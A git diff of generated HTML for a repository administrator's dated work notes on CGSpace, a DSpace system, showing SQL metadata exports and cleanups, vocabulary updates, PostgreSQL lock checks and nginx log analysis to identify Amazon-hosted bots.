<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p <span style="color:#e6db74">&#39;fuuuuuuuu&#39;</span>
</span></span></code></pre></div><ul>
<li>I added the account to the Alliance Admins account, which is should allow him to submit to any Alliance collection
<ul>
<li>According to my notes from <a href="/cgspace-notes/2020-10/">2020-10</a> the account must be in the admin group in order to submit via the REST API</li>
@ -371,13 +371,13 @@ ldap_sasl_bind(SIMPLE): Can&#39;t contact LDAP server (-1)
<li>Run <code>dspace cleanup -v</code> process on CGSpace to clean up old bitstreams</li>
<li>Export lists of authors, donors, and affiliations for Peter Ballantyne to clean up:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.author&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-authors.csv WITH CSV HEADER;
COPY 80901
localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.donor&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-donors.csv WITH CSV HEADER;
COPY 1274
localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-affiliations.csv WITH CSV HEADER;
COPY 8091
</code></pre></div><h2 id="2021-09-23">2021-09-23</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.author&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-authors.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 80901
</span></span><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.donor&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-donors.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 1274
</span></span><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-affiliations.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 8091
</span></span></code></pre></div><h2 id="2021-09-23">2021-09-23</h2>
<ul>
<li>Peter sent me back the corrections for the affiliations
<ul>
@ -386,24 +386,24 @@ COPY 8091
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csv-metadata-quality -i ~/Downloads/2021-09-20-affiliations.csv -o /tmp/affiliations.csv -x cg.contributor.affiliation
$ csvgrep -c <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#e6db74">&#39;DELETE&#39;</span> /tmp/affiliations.csv &gt; /tmp/affiliations-delete.csv
$ csvgrep -c <span style="color:#e6db74">&#39;correct&#39;</span> -r <span style="color:#e6db74">&#39;^.+$&#39;</span> /tmp/affiliations.csv | csvgrep -i -c <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#e6db74">&#39;DELETE&#39;</span> &gt; /tmp/affiliations-fix.csv
$ ./ilri/fix-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.contributor.affiliation -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">211</span>
$ ./ilri/delete-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.contributor.affiliation -m <span style="color:#ae81ff">211</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csv-metadata-quality -i ~/Downloads/2021-09-20-affiliations.csv -o /tmp/affiliations.csv -x cg.contributor.affiliation
</span></span><span style="display:flex;"><span>$ csvgrep -c <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#e6db74">&#39;DELETE&#39;</span> /tmp/affiliations.csv &gt; /tmp/affiliations-delete.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c <span style="color:#e6db74">&#39;correct&#39;</span> -r <span style="color:#e6db74">&#39;^.+$&#39;</span> /tmp/affiliations.csv | csvgrep -i -c <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#e6db74">&#39;DELETE&#39;</span> &gt; /tmp/affiliations-fix.csv
</span></span><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.contributor.affiliation -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">211</span>
</span></span><span style="display:flex;"><span>$ ./ilri/delete-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.contributor.affiliation -m <span style="color:#ae81ff">211</span>
</span></span></code></pre></div><ul>
<li>Then I updated the controlled vocabulary for affiliations by exporting the top 1,000 used terms:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1000) to /tmp/2021-09-23-affiliations.csv WITH CSV HEADER;
$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-09-23-affiliations.csv | sed 1d &gt; /tmp/affiliations.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1000) to /tmp/2021-09-23-affiliations.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-09-23-affiliations.csv | sed 1d &gt; /tmp/affiliations.txt
</span></span></code></pre></div><ul>
<li>Peter also sent me 310 corrections and 234 deletions for donors so I applied those and updated the controlled vocabularies too</li>
<li>Move some One CGIAR-related collections around the CGSpace hierarchy for Peter Ballantyne</li>
<li>Mohammed Salem asked me for an ID to UUID mapping for CGSpace collections, so I generated one similar to the ID one I sent him in 2020-11:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT collection_id,uuid FROM collection WHERE collection_id IS NOT NULL) TO /tmp/2021-09-23-collection-id2uuid.csv WITH CSV HEADER;
COPY 1139
</code></pre></div><h2 id="2021-09-24">2021-09-24</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT collection_id,uuid FROM collection WHERE collection_id IS NOT NULL) TO /tmp/2021-09-23-collection-id2uuid.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 1139
</span></span></code></pre></div><h2 id="2021-09-24">2021-09-24</h2>
<ul>
<li>Peter and Abenet agreed that we should consider converting more of our UPPER CASE metadata values to Title Case
<ul>
@ -435,33 +435,33 @@ COPY 1139
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=231;
UPDATE 2903
localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.coverage.subregion&#34; FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 231) to /tmp/2021-09-24-subregions.txt;
COPY 1200
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=231;
</span></span><span style="display:flex;"><span>UPDATE 2903
</span></span><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.coverage.subregion&#34; FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 231) to /tmp/2021-09-24-subregions.txt;
</span></span><span style="display:flex;"><span>COPY 1200
</span></span></code></pre></div><ul>
<li>Then I process the list for matches with my <code>subdivision-lookup.py</code> script, and extract only the values that matched:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/subdivision-lookup.py -i /tmp/2021-09-24-subregions.txt -o /tmp/subregions.csv
$ csvgrep -c matched -m <span style="color:#e6db74">&#39;true&#39;</span> /tmp/subregions.csv | csvcut -c <span style="color:#ae81ff">1</span> | sed 1d &gt; /tmp/subregions-matched.txt
$ wc -l /tmp/subregions-matched.txt
81 /tmp/subregions-matched.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/subdivision-lookup.py -i /tmp/2021-09-24-subregions.txt -o /tmp/subregions.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m <span style="color:#e6db74">&#39;true&#39;</span> /tmp/subregions.csv | csvcut -c <span style="color:#ae81ff">1</span> | sed 1d &gt; /tmp/subregions-matched.txt
</span></span><span style="display:flex;"><span>$ wc -l /tmp/subregions-matched.txt
</span></span><span style="display:flex;"><span>81 /tmp/subregions-matched.txt
</span></span></code></pre></div><ul>
<li>Then I updated the controlled vocabulary in the submission forms</li>
<li>I did the same for <code>dcterms.audience</code>, taking special care to a few all-caps values:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value != &#39;NGOS&#39; AND text_value != &#39;CGIAR&#39;;
localhost/dspace63= &gt; UPDATE metadatavalue SET text_value=&#39;NGOs&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = &#39;NGOS&#39;;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value != &#39;NGOS&#39; AND text_value != &#39;CGIAR&#39;;
</span></span><span style="display:flex;"><span>localhost/dspace63= &gt; UPDATE metadatavalue SET text_value=&#39;NGOs&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = &#39;NGOS&#39;;
</span></span></code></pre></div><ul>
<li>Update submission form comment for DOIs because it was still recommending people use the &ldquo;dx.doi.org&rdquo; format even though I batch updated all DOIs to the &ldquo;doi.org&rdquo; format a few times in the last year
<ul>
<li>Then I updated all existing metadata to the new format again:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;https://dx.doi.org&#39;, &#39;https://doi.org&#39;) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE &#39;https://dx.doi.org%&#39;;
UPDATE 49
</code></pre></div><h2 id="2021-09-26">2021-09-26</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;https://dx.doi.org&#39;, &#39;https://doi.org&#39;) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE &#39;https://dx.doi.org%&#39;;
</span></span><span style="display:flex;"><span>UPDATE 49
</span></span></code></pre></div><h2 id="2021-09-26">2021-09-26</h2>
<ul>
<li>Mohammed Salem told me last week that MELSpace and WorldFish have been upgraded to DSpace 6 so I updated the repository setup in AReS to use the UUID field instead of IDs
<ul>
@ -489,26 +489,26 @@ UPDATE 49
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c <span style="color:#e6db74">&#39;id,collection,dc.title[en_US]&#39;</span> ~/Downloads/10568-106990.csv &gt; /tmp/2021-09-28-alliance-reports.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,collection,dc.title[en_US]&#39;</span> ~/Downloads/10568-106990.csv &gt; /tmp/2021-09-28-alliance-reports.csv
</span></span></code></pre></div><ul>
<li>She sent it back fairly quickly with a new column marked &ldquo;Move&rdquo; so I extracted those items that matched and set them to the new owning collection:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvgrep -c Move -m <span style="color:#e6db74">&#39;Yes&#39;</span> ~/Downloads/2021_28_09_alliance_reports_csv.csv | csvcut -c 1,2 | sed <span style="color:#e6db74">&#39;s_10568/106990_10568/111506_&#39;</span> &gt; /tmp/alliance-move.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvgrep -c Move -m <span style="color:#e6db74">&#39;Yes&#39;</span> ~/Downloads/2021_28_09_alliance_reports_csv.csv | csvcut -c 1,2 | sed <span style="color:#e6db74">&#39;s_10568/106990_10568/111506_&#39;</span> &gt; /tmp/alliance-move.csv
</span></span></code></pre></div><ul>
<li>Maria from the Alliance emailed us to say that approving submissions was slow on CGSpace
<ul>
<li>I looked at the PostgreSQL activity and it seems low:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_stat_activity&#39; | wc -l
59
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_stat_activity&#39; | wc -l
</span></span><span style="display:flex;"><span>59
</span></span></code></pre></div><ul>
<li>Locks look high though:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | sort | uniq -c | wc -l
1154
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | sort | uniq -c | wc -l
</span></span><span style="display:flex;"><span>1154
</span></span></code></pre></div><ul>
<li>Indeed it seems something started causing locks to increase yesterday:</li>
</ul>
<p><img src="/cgspace-notes/2021/09/postgres_locks_ALL-week.png" alt="PostgreSQL locks week"></p>
@ -520,9 +520,9 @@ UPDATE 49
<li>The number of DSpace sessions is normal, hovering around 1,000&hellip;</li>
<li>Looking closer at the PostgreSQL activity log, I see the locks are all held by the <code>dspaceCli</code> user&hellip; which seem weird:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">postgres@linode18:~$ psql -c &#34;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name=&#39;dspaceCli&#39;;&#34; | wc -l
1096
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#34;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name=&#39;dspaceCli&#39;;&#34; | wc -l
</span></span><span style="display:flex;"><span>1096
</span></span></code></pre></div><ul>
<li>Now I&rsquo;m wondering why there are no connections from <code>dspaceApi</code> or <code>dspaceWeb</code>. Could it be that our Tomcat JDBC pooling via JNDI isn&rsquo;t working?
<ul>
<li>I see the same thing on DSpace Test hmmmm</li>
@ -536,14 +536,14 @@ UPDATE 49
<ul>
<li>Export a list of ILRI subjects from CGSpace to validate against AGROVOC for Peter and Abenet:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 203) to /tmp/2021-09-29-ilri-subject.txt;
COPY 149
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 203) to /tmp/2021-09-29-ilri-subject.txt;
</span></span><span style="display:flex;"><span>COPY 149
</span></span></code></pre></div><ul>
<li>Then validate and format the matches:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/agrovoc-lookup.py -i /tmp/2021-09-29-ilri-subject.txt -o /tmp/2021-09-29-ilri-subjects.csv -d
$ csvcut -c subject,<span style="color:#e6db74">&#39;match type&#39;</span> /tmp/2021-09-29-ilri-subjects.csv | sed -e <span style="color:#e6db74">&#39;s/match type/matched/&#39;</span> -e <span style="color:#e6db74">&#39;s/\(alt\|pref\)Label/yes/&#39;</span> &gt; /tmp/2021-09-29-ilri-subjects2.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/agrovoc-lookup.py -i /tmp/2021-09-29-ilri-subject.txt -o /tmp/2021-09-29-ilri-subjects.csv -d
</span></span><span style="display:flex;"><span>$ csvcut -c subject,<span style="color:#e6db74">&#39;match type&#39;</span> /tmp/2021-09-29-ilri-subjects.csv | sed -e <span style="color:#e6db74">&#39;s/match type/matched/&#39;</span> -e <span style="color:#e6db74">&#39;s/\(alt\|pref\)Label/yes/&#39;</span> &gt; /tmp/2021-09-29-ilri-subjects2.csv
</span></span></code></pre></div><ul>
<li>I talked to Salem about depositing from MEL to CGSpace
<ul>
<li>He mentioned that the one issue is that when you deposit to a workflow you don&rsquo;t get a Handle or any kind of identifier back!</li>

View File

@ -46,7 +46,7 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
So we have 1879/7100 (26.46%) matching already
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -136,15 +136,15 @@ So we have 1879/7100 (26.46%) matching already
<ul>
<li>Export all affiliations on CGSpace and run them against the latest RoR data dump:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
ations-matching.csv
$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
1879
$ wc -l /tmp/2021-10-01-affiliations.txt
7100 /tmp/2021-10-01-affiliations.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
</span></span><span style="display:flex;"><span>ations-matching.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
</span></span><span style="display:flex;"><span>1879
</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-10-01-affiliations.txt
</span></span><span style="display:flex;"><span>7100 /tmp/2021-10-01-affiliations.txt
</span></span></code></pre></div><ul>
<li>So we have 1879/7100 (26.46%) matching already</li>
</ul>
<h2 id="2021-10-03">2021-10-03</h2>
@ -185,37 +185,37 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># zcat --force /var/log/nginx/*.log* | grep <span style="color:#e6db74">&#39;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)&#39;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/mozilla-4.0-ips.txt
# wc -l /tmp/mozilla-4.0-ips.txt
543 /tmp/mozilla-4.0-ips.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat --force /var/log/nginx/*.log* | grep <span style="color:#e6db74">&#39;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)&#39;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/mozilla-4.0-ips.txt
</span></span><span style="display:flex;"><span># wc -l /tmp/mozilla-4.0-ips.txt
</span></span><span style="display:flex;"><span>543 /tmp/mozilla-4.0-ips.txt
</span></span></code></pre></div><ul>
<li>Then I resolved the IPs and extracted the ones belonging to Amazon:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/resolve-addresses-geoip2.py -i /tmp/mozilla-4.0-ips.txt -k <span style="color:#e6db74">&#34;</span>$ABUSEIPDB_API_KEY<span style="color:#e6db74">&#34;</span> -o /tmp/mozilla-4.0-ips.csv
$ csvgrep -c asn -m <span style="color:#ae81ff">14618</span> /tmp/mozilla-4.0-ips.csv | csvcut -c ip | sed 1d | tee /tmp/amazon-ips.txt | wc -l
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/mozilla-4.0-ips.txt -k <span style="color:#e6db74">&#34;</span>$ABUSEIPDB_API_KEY<span style="color:#e6db74">&#34;</span> -o /tmp/mozilla-4.0-ips.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c asn -m <span style="color:#ae81ff">14618</span> /tmp/mozilla-4.0-ips.csv | csvcut -c ip | sed 1d | tee /tmp/amazon-ips.txt | wc -l
</span></span></code></pre></div><ul>
<li>I am thinking I will purge them all, as I have several indicators that they are bots: mysterious user agent, IP owned by Amazon</li>
<li>Even more interesting, these requests are weighted VERY heavily on the CGIAR System community:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"> 1592 GET /handle/10947/2526
1592 GET /handle/10947/2527
1592 GET /handle/10947/34
1593 GET /handle/10947/6
1594 GET /handle/10947/1
1598 GET /handle/10947/2515
1598 GET /handle/10947/2516
1599 GET /handle/10568/101335
1599 GET /handle/10568/91688
1599 GET /handle/10947/2517
1599 GET /handle/10947/2518
1599 GET /handle/10947/2519
1599 GET /handle/10947/2708
1599 GET /handle/10947/2871
1600 GET /handle/10568/89342
1600 GET /handle/10947/4467
1607 GET /handle/10568/103816
290382 GET /handle/10568/83389
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span> 1592 GET /handle/10947/2526
</span></span><span style="display:flex;"><span> 1592 GET /handle/10947/2527
</span></span><span style="display:flex;"><span> 1592 GET /handle/10947/34
</span></span><span style="display:flex;"><span> 1593 GET /handle/10947/6
</span></span><span style="display:flex;"><span> 1594 GET /handle/10947/1
</span></span><span style="display:flex;"><span> 1598 GET /handle/10947/2515
</span></span><span style="display:flex;"><span> 1598 GET /handle/10947/2516
</span></span><span style="display:flex;"><span> 1599 GET /handle/10568/101335
</span></span><span style="display:flex;"><span> 1599 GET /handle/10568/91688
</span></span><span style="display:flex;"><span> 1599 GET /handle/10947/2517
</span></span><span style="display:flex;"><span> 1599 GET /handle/10947/2518
</span></span><span style="display:flex;"><span> 1599 GET /handle/10947/2519
</span></span><span style="display:flex;"><span> 1599 GET /handle/10947/2708
</span></span><span style="display:flex;"><span> 1599 GET /handle/10947/2871
</span></span><span style="display:flex;"><span> 1600 GET /handle/10568/89342
